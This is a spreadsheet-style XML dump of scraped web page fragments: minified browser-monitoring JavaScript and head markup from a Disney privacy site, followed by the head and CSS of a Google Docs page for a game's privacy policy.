0!==arguments[2])||arguments[2];if(super(r,n,w.t9,i),("undefined"==typeof PerformanceNavigationTiming||u. T)&amp;&amp;"undefined"!=typeof</t>
  </si>
  <si>
    <t>PerformanceTiming){const n=(0,t.OP)(r);n[w. Dz]=Math.max(Date.now()-n.offset,0),(0,l. K)((()=&gt;n[w.qw]=Math.max((0,y.z)()-n[w.</t>
  </si>
  <si>
    <t>Dz],0))),(0,l.b)((()=&gt;{const t=(0,y.z)();n[w. OJ]=Math.max(t-n[w. Dz],0),(0,c.p)("timing",["load",t],void 0,e.</t>
  </si>
  <si>
    <t>D.pageViewTiming,this.ee)}))}this.importAggregator()}}p=A,m="featureName",b=w.t9,(m=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value. ")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(m))in p?Object.defineProperty(p,m,{value:b,enumerable:!0,configurable:!0,writable:!0}):p[m]=b;var x=i(9557),j=i(7022);class _ extends x.w{constructor(e){super(e),this.aggregatedData={}}store(e,t,r,n,i){var o=this.getBucket(e,t,r,i);return o.metrics=function(e,t){t||(t={count:0});return t.count+=1,(0,j. D)(e,(function(e,r){t[e]=E(r,t[e])})),t}(n,o.metrics),o}merge(e,t,r,n,i){var o=this.getBucket(e,t,n,i);if(o.metrics){var a=o.metrics;a.count+=r.count,(0,j.</t>
  </si>
  <si>
    <t>D)(r,(function(e,t){if("count"!==e){var n=a[e],i=r[e];i&amp;&amp;!i.c?a[e]=E(i.t,n):a[e]=function(e,t){if(!t)return e;t.c||(t=D(t.t));return t.min=Math.min(e.min,t.min),t.max=Math.max(e.max,t.max),t.t+=e.t,t.sos+=e.sos,t.c+=e.c,t}(i,a[e])}}))}else o.metrics=r}storeMetric(e,t,r,n){var i=this.getBucket(e,t,r);return i.stats=E(n,i.stats),i}getBucket(e,t,r,n){this.aggregatedData[e]||(this.aggregatedData[e]={});var i=this.aggregatedData[e][t];return i||(i=this.aggregatedData[e][t]={params:r||{}},n&amp;&amp;(i.custom=n)),i}get(e,t){return t?this.aggregatedData[e]&amp;&amp;this.aggregatedData[e][t]:this.aggregatedData[e]}take(e){for(var t={},r="",n=!1,i=0;i&lt;e.length;i++)t[r=e[i]]=k(this.aggregatedData[r]),t[r].length&amp;&amp;(n=!0),delete this.aggregatedData[r];return n?t:null}}function E(e,t){return null==e?function(e){e?e.c++:e={c:1};return e}(t):t?(t.c||(t=D(t.t)),t.c+=1,t.t+=e,t.sos+=e*e,e&gt;t.max&amp;&amp;(t.max=e),e&lt;t.min&amp;&amp;(t.min=e),t):{t:e}}function D(e){return{t:e,min:e,max:e,sos:e*e,c:1}}function k(e){return"object"!=typeof e?[]:(0,j. D)(e,S)}function S(e,t){return t}var P=i(6797),T=i(5526),N=i(2438);var O=i(6998),I=i(8544),C=i(6382);class R extends h{constructor(e,r){let n=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];super(e,r,C.t,n),g.il&amp;&amp;((0,t. OP)(e).initHidden=Boolean("hidden"===document.visibilityState),(0,O.N)((()=&gt;(0,c.p)("docHidden",[(0,y.z)()],void 0,C.t,this.ee)),!0),(0,I.bP)("pagehide",(()=&gt;(0,c.p)("winPagehide",[(0,y.z)()],void 0,C.t,this.ee))),this.importAggregator())}}!function(e,t,r){(t=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value.</t>
  </si>
  <si>
    <t>")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r}(R,"featureName",C.t);const M=Boolean(g._A?.Worker),z=Boolean(g._A?.SharedWorker),B=Boolean(g._A?.navigator?.serviceWorker);let q,W,V;var L=i(6034);class Z extends h{constructor(t,r){let n=!(arguments.length&gt;2&amp;&amp;void 0!==arguments[2])||arguments[2];super(t,r,L.t9,n),function(e){if(!q){if(M){q=Worker;try{g._A.Worker=r(q,"Dedicated")}catch(e){o(e,"Dedicated")}if(z){W=SharedWorker;try{g._A.SharedWorker=r(W,"Shared")}catch(e){o(e,"Shared")}}else n("Shared");if(B){V=navigator.serviceWorker.register;try{g._A.navigator.serviceWorker.register=(t=V,function(){for(var e=arguments.length,r=new Array(e),n=0;n&lt;e;n++)r[n]=arguments[n];return i("Service",r[1]?.type),t.apply(navigator.serviceWorker,r)})}catch(e){o(e,"Service")}}else n("Service");var t;return}n("All")}function r(e,t){return"undefined"==typeof Proxy?e:new Proxy(e,{construct:(e,r)=&gt;(i(t,r[1]?.type),new e(...r))})}function n(t){g.v6||e("Workers/".concat(t,"/Unavailable"))}function i(t,r){e("Workers/".concat(t,"module"===r?"/Module":"/Classic"))}function o(t,r){e("Workers/".concat(r,"/SM/Unsupported")),(0,v. Z)("NR Agent: Unable to capture ".concat(r," workers.</t>
  </si>
  <si>
    <t>"),t)}}((t=&gt;(0,c.p)(L.xS,[t],void 0,e. D.metrics,this.ee))),this.importAggregator()}}!function(e,t,r){(t=function(e){var t=function(e,t){if("object"!=typeof e||null===e)return e;var r=e[Symbol.toPrimitive];if(void 0!==r){var n=r.call(e,t||"default");if("object"!=typeof n)return n;throw new TypeError("@@toPrimitive must return a primitive value. ")}return("string"===t?String:Number)(e)}(e,"string");return"symbol"==typeof t?t:String(t)}(t))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r}(Z,"featureName",L.t9),new class{constructor(e){let t=arguments.length&gt;1&amp;&amp;void 0!==arguments[1]?arguments[1]:(0,T.ky)(16);this.agentIdentifier=t,this.sharedAggregator=new _({agentIdentifier:this.agentIdentifier}),this.features={},this.desiredFeatures=new Set(e.features||[]),this.desiredFeatures.add(A),Object.assign(this,(0,a.j)(this.agentIdentifier,e,e.loaderType||"agent")),this.start()}get config(){return{info:(0,t.</t>
  </si>
  <si>
    <t>C5)(this.agentIdentifier),init:(0,t. P_)(this.agentIdentifier),loader_config:(0,t. DL)(this.agentIdentifier),runtime:(0,t.</t>
  </si>
  <si>
    <t>OP)(this.agentIdentifier)}}start(){const t="features";try{const r=n(this.agentIdentifier),i=Array.from(this.desiredFeatures);i.sort(((t,r)=&gt;e.p[t.featureName]-e.p[r.featureName])),i.forEach((t=&gt;{if(r[t.featureName]||t.featureName===e.D.pageViewEvent){const e=(0,s.Z)(t.featureName);e.every((e=&gt;r[e]))||(0,v. Z)("".concat(t.featureName," is enabled but one or more dependent features has been disabled (").concat((0,N.P)(e),").</t>
  </si>
  <si>
    <t>This may cause unintended consequences or missing data...")),this.features[t.featureName]=new t(this.agentIdentifier,this.sharedAggregator)}})),(0,P.Qy)(this.agentIdentifier,this.features,t)}catch(e){(0,v.Z)("Failed to initialize all enabled instrument classes (agent aborted) -",e);for(const e in this.features)this.features[e].abortHandler?.();const r=(0,P.fP)();return delete r.initializedAgents[this.agentIdentifier]?.api,delete r.initializedAgents[this.agentIdentifier]?.[t],delete this.sharedAggregator,r.ee?.abort(),delete r.ee?.get(this.agentIdentifier),!1}}}({features:[A,R,Z],loaderType:"lite"})})(),window.NRBA=o})();&lt;/script&gt;
    &lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
    &lt;link rel="apple-touch-icon" sizes="180x180" href="https://privacy.thewaltdisneycompany.com/app/themes/privacycenter/assets/dist/images/favicons/apple-touch-icon.png"&gt;
    &lt;link rel="icon" type="image/png" sizes="32x32" href="https://privacy.thewaltdisneycompany.com/app/themes/privacycenter/assets/dist/images/favicons/favicon-32x32.png"&gt;
    &lt;link rel="icon" type="image/png" sizes="16x16" href="https://privacy.thewaltdisneycompany.com/app/themes/privacycenter/assets/dist/images/favicons/favicon-16x16.png"&gt;
    &lt;link rel="mask-icon" href="https://privacy.thewaltdisneycompany.com/app/themes/privacycenter/assets/dist/images/favicons/safari-pinned-tab.svg" color="#5bbad5"&gt;
    &lt;meta name="theme-color" content="#ffffff"&gt;
    &lt;script id="typekit"&gt;
        (function(d) {
            var config = {
                    kitId: 'ysb6omh',
                    scriptTimeout: 3000,
                    async: true
                },
                h=d.documentElement,t=setTimeout(function(){h.className=h.className.replace(/\bwf-loading\b/g,"")+" wf-inactive";},config.scriptTimeout),tk=d.createElement("script"),f=false,s=d.getElementsByTagName("script")[0],a;h.className+=" wf-loading";tk.src='https://use.typekit.net/'+config.kitId+'.js';tk.async=true;tk.onload=tk.onreadystatechange=function(){a=this.readyState;if(f||a&amp;&amp;a!="complete"&amp;&amp;a!="loaded")return;f=true;clearTimeout(t);try{Typekit.load(config)}catch(e){}};s.parentNode.insertBefore(tk,s)
        })(document);
    &lt;/script&gt;
    &lt;script async id="" src="https://cdn.registerdisney.go.com/v4/OneID.js"&gt;&lt;/script&gt;&lt;meta name="robots" content="index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ar/current-privacy-policy-ar/" hreflang="ar"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/id/kebijakan-privasi-kami/" hreflang="id"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ms/dasar-privasi-kami/" hreflang="ms"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/pt-br/nossa-politica-de-privacidade/" hreflang="pt-BR"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ bg/current-privacy-policy-bg-bg/" hreflang="bg"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/fr-ca/notre-politique-de-protection-de-la-vie-privee/" hreflang="fr-CA"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/zh/current-privacy-policy-zh-cn/" hreflang="zh-CN"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/cs/zasady-ochrany-osobnich-udaju/" hreflang="cs"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/zh-hk/current-privacy-policy-zh-hk/" hreflang="zh-HK"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/zh-tw/current-privacy-policy-zh-tw/" hreflang="zh-TW"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/da/vores-fortrolighedspolitik/" hreflang="da"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/nl/privacybeleid/" hreflang="nl"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/en/current-privacy-policy/" hreflang="en"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/fi/yksityisyyssuoja/" hreflang="fi"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/fr/regles-de-respect-de-la-vie-privee/" hreflang="fr-FR"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/de/datenschutzerklarung/" hreflang="de"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/el/current-privacy-policy-el/" hreflang="el"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/he/current-privacy-policy-he-il/" hreflang="he"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/hi/current-privacy-policy-hi-in/" hreflang="hi"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/hu/adatvedelmi-szabalyzat/" hreflang="hu"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/it/informativa-sulla-privacy/" hreflang="it"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ja/current-privacy-policy-ja/" hreflang="ja"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/ko/current-privacy-policy-ko-kr/" hreflang="ko"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/nn/retningslinjer-for-personvern/" hreflang="nn"&gt;
&lt;link rel="alternate" href="https://privacy.thewaltdisneycompany.com/pl/polityka-prywatnosci/" hreflang="pl"&gt;
&lt;link rel="alternate" href=</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;&lt;html lang="en"&gt;&lt;head&gt;&lt;script nonce="rrInQMIK-x9E_tEoYvJkDA"&gt;var DOCS_timing={}; DOCS_timing['pls']=new Date().getTime();&lt;/script&gt;&lt;meta property="og:title" content="Cat Fishing Simulator"&gt;&lt;meta property="og:type" content="article"&gt;&lt;meta property="og:site_name" content="Google Docs"&gt;&lt;meta property="og:url" content="https://docs.google.com/document/d/1kIVdRc280zSdR3qZ_whqBSvYfy4nWzmSK5xm_ae2hu4/edit?usp=sharing&amp;amp;usp=embed_facebook"&gt;&lt;meta property="og:image" content="https://lh3.googleusercontent.com/docs/ADP-6oHwnEOcOJYmhBP0kH0Dmcd2yk0cVG1AKg4uR1MpQ1XrIpxp1pgBcrZ9XtZz3JzKX27nchFMtq5JeJfNzQzv6pEKA2iDpGjdKN9JLMyLeKSC=w1200-h630-p"&gt;&lt;meta property="og:image:width" content="1200"&gt;&lt;meta property="og:image:height" content="630"&gt;&lt;meta property="og:description" content="Cat Fishing Simulator 					  Privacy Policy Giant Fish built Cat Fishing Simulator as a commercial game. This service is provided by Giant Fish and is intended for use as is. This page is used to inform visitors regarding our policies with the collection, use and disclosure of personal information..."&gt;&lt;meta name="google" content="notranslate"&gt;&lt;meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0"&gt;&lt;meta http-equiv="X-UA-Compatible" content="IE=edge;"&gt;&lt;meta name="fragment" content="!"&gt;&lt;meta name="referrer" content="origin"&gt;&lt;title&gt;Cat Fishing Simulator - Google Docs&lt;/title&gt;&lt;link rel="shortcut icon" href="https://ssl.gstatic.com/docs/documents/images/kix-favicon7.ico"&gt;&lt;link rel="chrome-webstore-item" href="https://chrome.google.com/webstore/detail/apdfllckaahabafndbhieahigkjlhalf"&gt;&lt;script nonce="rrInQMIK-x9E_tEoYvJkDA"&gt;_docs_webfonts_fontFaces = null; _docs_webfonts_iframe_fontFaces = null;DOCS_timing['wpid']=new Date().getTime();&lt;/script&gt;&lt;style nonce="ztosj3dMjpLILeEwBGa1KA"&gt;.gb_8a:not(.gb_od){font:13px/27px Roboto,Arial,sans-serif;z-index:986}@-webkit-keyframes gb__a{0%{opacity:0}50%{opacity:1}}@-moz-keyframes gb__a{0%{opacity:0}50%{opacity:1}}@-o-keyframes gb__a{0%{opacity:0}50%{opacity:1}}@keyframes gb__a{0%{opacity:0}50%{opacity:1}}a.gb_fa{border:none;color:#4285f4;cursor:default;font-weight:bold;outline:none;position:relative;text-align:center;text-decoration:none;text-transform:uppercase;white-space:nowrap;-moz-user-select:none;-ms-user-select:none;-webkit-user-select:none}a.gb_fa:hover:after,a.gb_fa:focus:after{background-color:rgba(0,0,0,.12);content:"";height:100%;left:0;position:absolute;top:0;width:100%}a.gb_fa:hover,a.gb_fa:focus{text-decoration:none}a.gb_fa:active{background-color:rgba(153,153,153,.4);text-decoration:none}a.gb_ga{background-color:#4285f4;color:#fff}a.gb_ga:active{background-color:#0043b2}.gb_ha{-moz-box-shadow:0 1px 1px rgba(0,0,0,.16);-webkit-box-shadow:0 1px 1px rgba(0,0,0,.16);box-shadow:0 1px 1px rgba(0,0,0,.16)}.gb_fa,.gb_ga,.gb_ia,.gb_ja{display:inline-block;line-height:28px;padding:0 12px;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px}.gb_ia{background:#f8f8f8;border:1px solid #c6c6c6}.gb_ja{background:#f8f8f8}.gb_ia,#gb a.gb_ia.gb_ia,.gb_ja{color:#666;cursor:default;text-decoration:none}#gb a.gb_ja.gb_ja{cursor:default;text-decoration:</t>
  </si>
  <si>
    <t>none}.gb_ja{border:1px solid #4285f4;font-weight:bold;outline:none;background:#4285f4;background:-moz-linear-gradient(top,#4387fd,#4683ea);background:-ms-linear-gradient(top,#4387fd,#4683ea);background:-o-linear-gradient(top,#4387fd,#4683ea);background:-webkit-linear-gradient(top,#4387fd,#4683ea);background:linear-gradient(top,#4387fd,#4683ea);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#4387fd,endColorstr=#4683ea,GradientType=0)}#gb a.gb_ja.gb_ja{color:#fff}.gb_ja:hover{-moz-box-shadow:0 1px 0 rgba(0,0,0,.15);-webkit-box-shadow:0 1px 0 rgba(0,0,0,.15);box-shadow:0 1px 0 rgba(0,0,0,.15)}.gb_ja:active{-moz-box-shadow:inset 0 2px 0 rgba(0,0,0,.15);-webkit-box-shadow:inset 0 2px 0 rgba(0,0,0,.15);box-shadow:inset 0 2px 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.15);background:#3c78dc;background:-moz-linear-gradient(top,#3c7ae4,#3f76d3);background:-ms-linear-gradient(top,#3c7ae4,#3f76d3);background:-o-linear-gradient(top,#3c7ae4,#3f76d3);background:-webkit-linear-gradient(top,#3c7ae4,#3f76d3);background:linear-gradient(top,#3c7ae4,#3f76d3);filter:progid:DXImageTransform.Microsoft.gradient(startColorstr=#3c7ae4,endColorstr=#3f76d3,GradientType=0)}#gb .gb_la{background:#fff;border:1px solid #dadce0;color:#1a73e8;display:inline-block;text-decoration:none}#gb .gb_la:hover{background:#f8fbff;border-color:#dadce0;color:#174ea6}#gb .gb_la:focus{background:#f4f8ff;color:#174ea6;outline:1px solid #174ea6}#gb .gb_la:active,#gb .gb_la:focus:active{background:#ecf3fe;color:#174ea6}#gb .gb_la.gb_g{background: transparent;border:1px solid #5f6368;color:#8ab4f8;text-decoration:none}#gb .gb_la.gb_g:hover{background:rgba(255,255,255,.04);color:#e8eaed}#gb .gb_la.gb_g</t>
  </si>
  <si>
    <t>:focus{background:rgba(232,234,237,.12);color:#e8eaed;outline:1px solid #e8eaed}#gb .gb_la.gb_g:active,#gb .gb_la.gb_g:focus:active{background:rgba(232,234,237,.1);color:#e8eaed}.gb_j{display:none!important}.gb_Ra{visibility:hidden}.gb_Ud{display:inline-block;vertical-align:middle}.gb_gf .gb_i{bottom:-3px;right:-5px}.gb_hf{position:relative}.gb_e{display:inline-block;outline:none;vertical-align:middle;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;height:40px;width:40px;color:#000;cursor:pointer;text-decoration:none}#gb#gb a.gb_e{color:#000;cursor:pointer;text-decoration:none}.gb_ab{border-color:transparent;border-bottom-color:#fff;border-style:dashed dashed solid;border-width:0 8.5px 8.5px;display:none;position:absolute;left:11.5px;top:43px;z-index:1;height:0;width:0;-webkit-animation:gb__a .2s;-moz-animation:gb__a .2s;-o-animation:gb__a .2s;animation:gb__a .2s}.gb_bb{border-color:transparent;border-style:dashed dashed solid;border-width:0 8.5px 8.5px;display:none;position:absolute;left:11.5px;z-index:1;height:0;width:0;-webkit-animation:gb__a .2s;-moz-animation:gb__a .2s;-o-animation:gb__a .2s;animation:gb__a .2s;border-bottom-color:#ccc;border-bottom-color:rgba(0,0,0,.2);top:42px}x:-o-prefocus,div.gb_bb{border-bottom-color:#ccc}.gb_P{background:#fff;border:1px solid #ccc;border-color:rgba(0,0,0,.2);color:#000;-webkit-box-shadow:0 2px 10px rgba(0,0,0,.2);-moz-box-shadow:0 2px 10px rgba(0,0,0,.2);box-shadow:0 2px 10px rgba(0,0,0,.2);display:none;outline:none;overflow:hidden;position:absolute;right:8px;top:62px;-webkit-animation:gb__a .2s;-moz-animation:gb__a .2s;-o-animation:gb__a .2s;animation:gb__a .2s;-moz-border-radius:2px;-webkit-border-radius:2px;border-radius:2px;-moz-user-select:text;-ms-user-select:text;-webkit-user-select:text}.gb_Ud.gb_Ba .gb_ab,.gb_Ud.gb_Ba .gb_bb,.gb_Ud.gb_Ba .gb_P,.gb_Ba.gb_P{display:block}.gb_Ud.gb_Ba.gb_if .gb_ab,.gb_Ud.gb_Ba.gb_if .gb_bb{display:none}.gb_jf{position:absolute;right:8px;top:62px;z-index:-1}.gb_Xa .gb_ab,.gb_Xa .gb_bb,.gb_Xa .gb_P{margin-top:-10px}.gb_Ud:first-child,#gbsfw:first-child+.gb_Ud{padding-left:4px}.gb_Fa.gb_xe .gb_Ud: first-child{padding-left:0}.gb_ye{position:relative}.gb_0c .gb_ye,.gb_Ed</t>
  </si>
  <si>
    <t>.gb_ye{float:right}.gb_e{padding:8px;cursor:pointer}.gb_Fa .gb_gd :not(.gb_fa):focus img{background-color:rgba(0,0,0,.20);outline:none;-webkit-border-radius:50%;-moz-border-radius:50%;border-radius:50%}.gb_ze button svg,.gb_e{-webkit-border-radius:50%;-moz-border-radius:50%;border-radius:50%}.gb_ze button:focus:not(:focus-visible) svg,.gb_ze button:hover svg,.gb_ze button:active svg,.gb_e:focus:not(:focus-visible),.gb_e:hover,.gb_e:active,.gb_e[aria-expanded=true]{outline:none}.gb_Jc .gb_ze.gb_Ae button:focus-visible svg,.gb_ze button:focus-visible svg,.gb_e:focus-visible{outline:1px solid #202124}.gb_Jc .gb_ze button:focus-visible svg,.gb_Jc .gb_e:focus-visible{outline:1px solid #f1f3f4}@media (forced-colors:active){.gb_Jc .gb_ze.gb_Ae button:focus-visible svg,.gb_ze button:focus-visible svg,.gb_Jc .gb_ze</t>
  </si>
  <si>
    <t>button:focus-visible svg{outline:1px solid currentcolor}}.gb_Jc .gb_ze.gb_Ae button:focus svg,.gb_Jc .gb_ze.gb_Ae button:focus:hover svg,.gb_ze button:focus svg,.gb_ze button:focus:hover svg,.gb_e:focus,.gb_e:focus:hover{background-color: rgba(60,64,67,.1)}.gb_Jc .gb_ze.gb_Ae button:active svg,.gb_ze button:active svg,.gb_e:active{background-color:rgba(60,64,67,.12)}.gb_Jc .gb_ze.gb_Ae button:hover svg,.gb_ze button:hover svg,.gb_e:hover{background-color:rgba(60,64,67,.08)}.gb_za</t>
  </si>
  <si>
    <t>.gb_e.gb_1a:hover{background-color:transparent}.gb_e[aria-expanded=true],.gb_e:hover[aria-expanded=true]{background-color:rgba(95,99,104,.24)}.gb_e[aria-expanded=true] .gb_Be,.gb_e[aria-expanded=true] .gb_Ce{fill:#5f6368;opacity:1}.gb_Jc .gb_ze button:hover svg,.gb_Jc .gb_e:hover{background-color:rgba(232,234,237,.08)}.gb_Jc .gb_ze button:focus svg,.gb_Jc .gb_ze button:focus:hover svg,.gb_Jc .gb_e:</t>
  </si>
  <si>
    <t>focus,.gb_Jc .gb_e :focus:hover{background-color:rgba(232,234,237,.10)}.gb_Jc .gb_ze button:active svg,.gb_Jc .gb_e :</t>
  </si>
  <si>
    <t>active{background-color:rgba(232,234,237,.12)}.gb_Jc .gb_e[aria-expanded=true],.gb_Jc .gb_e:hover[aria-expanded=true]{background-color:rgba(255,255,255,.12)}.gb_Jc .gb_e[aria-expanded=true] .gb_Be,.gb_Jc .gb_e[aria-expanded=true] .gb_Ce{fill:#fff;opacity:1}.gb_Ud{padding:4px}.gb_Fa.gb_xe .gb_Ud{padding:4px 2px}.gb_Fa.gb_xe</t>
  </si>
  <si>
    <t>.gb_b.gb_Ud{padding-left:6px}.gb_P{z-index:991;line-height:normal}.gb_P.gb_De{left:8px;right:auto}@media (max-width:350px){.gb_P.gb_De{left:0}}.gb_Ee .gb_P{top:56px}.gb_N .gb_e,.gb_O .gb_N .gb_e{background-position:-64px -29px}.gb_t .gb_N</t>
  </si>
  <si>
    <t>.gb_e{background-position:-29px -29px;opacity:1}.gb_N .gb_e,.gb_N .gb_e: hover,.gb_N .gb_e:focus{opacity:1}.gb_pd{display:none}@media screen and (max-width:319px){.gb_sd:not(.gb_xd) .gb_N{display:none;visibility:hidden}}.gb_i{display:none}.gb_8c{font-family:Google Sans,Roboto,Helvetica,Arial,sans-serif;font-size:20px;font-weight:400;letter-spacing:0.25px;line-height:48px;margin-bottom:2px;opacity:1;overflow:hidden;padding-left:16px;position:relative;text-overflow:ellipsis;vertical-align:middle;top:2px;white-space:nowrap;-ms-flex:1 1 auto;-webkit-flex:1 1 auto;flex:1 1 auto}.gb_8c.gb_9c{color:#3c4043}.gb_Fa.gb_Ha .gb_8c{margin-bottom:0}.gb_ad.gb_bd .gb_8c{padding-left:4px}.gb_Fa.gb_Ha .gb_cd{position:relative;top:-2px}.gb_Fa{color:black;min-width:160px;position:relative;-moz-transition:box-shadow 250ms;-ms-transition:box-shadow 250ms;-o-transition:box-shadow 250ms;-webkit-transition:box-shadow 250ms;transition:box-shadow 250ms}.gb_Fa.gb_Rc{min-width:120px}.gb_Fa.gb_qd .gb_rd{display:none}.gb_Fa.gb_qd .gb_sd{height:56px}header.gb_Fa{display:block}.gb_Fa svg{fill:currentColor}.gb_td{position:fixed;top:0;width:100%}.gb_ud{-webkit-box-shadow:0 4px 5px 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.14),0 1px 10px 0 rgba(0,0,0,.12),0 2px 4px -1px rgba(0,0,0,.2);-moz-box-shadow:0 4px 5px 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.14),0 1px 10px 0 rgba(0,0,0,.12),0 2px 4px -1px rgba(0,0,0,.2);box-shadow:0 4px 5px 0</t>
  </si>
  <si>
    <t>rgba(0,0,0,.14),0 1px 10px 0 rgba(0,0,0,.12),0 2px 4px</t>
  </si>
  <si>
    <t>-1px rgba(0,0,0,.2)}.gb_vd{height:64px}.gb_sd{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;position:relative;width:100%;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;-webkit-box-pack:space-between;-ms-flex-pack:justify;-webkit-justify-content:space-between;justify-content:space-between;min-width:-webkit-min-content;min-width:-moz-min-content;min-width:-ms-min-content;min-width:min-content}.gb_Fa:not(.gb_Ha) .gb_sd{padding:8px}.gb_Fa.gb_wd .gb_sd{-ms-flex:1 0 auto;-webkit-flex:1 0</t>
  </si>
  <si>
    <t>auto;flex:1 0 auto}.gb_Fa .gb_sd.gb_xd.gb_yd{min-width:0}.gb_Fa.gb_Ha .gb_sd{padding:4px;padding-left:8px;min-width:0}.gb_rd{height:48px;vertical-align:middle;white-space:nowrap;-ms-flex-align:center;-moz-box-align:center;-webkit-box-align:center;-webkit-align-items:center;align-items:center;display:-webkit-box;display:-moz-box;display:-ms-flexbox;display:-webkit-flex;display:flex;-moz-user-select:-moz-none;-ms-user-select:none;-webkit-user-select:none}.gb_Ad&gt;.gb_rd{display:table-cell;width:100%}.gb_ad{padding-right:30px;-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;-ms-flex:1 0 auto;-webkit-flex:1 0 auto;flex:1 0</t>
  </si>
  <si>
    <t>auto}.gb_Fa.gb_Ha .gb_ad{padding-right:14px}.gb_Bd{-ms-flex:1 1 100%;-webkit-flex:1 1 100%;flex:1 1 100%}.gb_Bd&gt;:only-child{display:inline-block}.gb_Cd.gb_1c{padding-left:4px}.gb_Cd.gb_Dd,.gb_Fa.gb_wd .gb_Cd,.gb_Fa.gb_Ha:not(.gb_Ed) .gb_Cd{padding-left:0}.gb_Fa.gb_Ha .gb_Cd.gb_Dd{padding-right:0}.gb_Fa.gb_Ha</t>
  </si>
  <si>
    <t>.gb_Cd.gb_Dd .gb_za{margin-left:10px}.gb_1c{display:inline}.gb_Fa.gb_Uc .gb_Cd.gb_Fd,.gb_Fa.gb_Ed .gb_Cd.gb_Fd{padding-left:2px}.gb_8c{display:inline-block}.gb_Cd{-moz-box-sizing:border-box;-webkit-box-sizing:border-box;box-sizing:border-box;height:48px;line-height:normal;padding:0 4px;padding-left:30px;-ms-flex:0 0 auto;-webkit-flex:0 0 auto;flex:0 0 auto;-webkit-box-pack:flex-end;-ms-flex-pack:end;-webkit-justify-content:flex-end;justify-content:flex-end}.gb_Ed{height:48px}.gb_Fa.gb_Ed{min-width:auto}.gb_Ed .gb_Cd{float</t>
  </si>
  <si>
    <t>:right;padding-left:32px}.gb_Ed .gb_Cd.gb_Hd{padding-left:0}.gb_Id{font-size:14px;max-width:200px;overflow:hidden;padding:0 12px;text-overflow:ellipsis;white-space:nowrap;-moz-user-select:text;-ms-user-select:text;-webkit-user-select:text}.gb_Jd{-webkit-transition:background-color .4s;-webkit-transition:background-color .4s;-o-transition:background-color .4s;transition: background-color .4s}.gb_Kd{color:black}.gb_Jc{color:white}.gb_Fa a,.gb_Oc a{color:inherit}.gb_D{color:rgba(0,0,0,.87)}.gb_Fa svg,.gb_Oc svg,.gb_ad .gb_Ld,.gb_0c .gb_Ld{color:#5f6368;opacity:1}.gb_Jc</t>
  </si>
  <si>
    <t>svg,.gb_Oc.gb_Sc svg,.gb_Jc .gb_ad .gb_Ld,.gb_Jc</t>
  </si>
  <si>
    <t>.gb_ad .gb_Ic,.gb_Jc .gb_ad</t>
  </si>
  <si>
    <t>.gb_cd,.gb_Oc.gb_Sc .gb_Ld{color: rgba(255,255,255,.87)}.gb_Jc .gb_ad .gb_Hc:</t>
  </si>
  <si>
